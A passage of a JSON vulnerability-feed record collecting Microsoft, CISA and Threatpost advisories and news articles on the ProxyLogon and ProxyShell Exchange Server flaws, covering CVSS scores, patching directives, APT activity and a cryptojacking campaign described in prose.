CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": "https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T15:51:43", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-03-10T18:11:04", "description": "Microsoft has released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities\u2014CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065\u2014to take control of an affected system and can exploit one vulnerability\u2014CVE-2021-26855\u2014to obtain access to sensitive information. These vulnerabilities are being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Microsoft blog post](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and apply the necessary updates or workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T00:00:00", "id": "CISA:16DE226AFC5A22020B20927D63742D98", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/24141216/ProxyLogon2-300x278.png)\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at 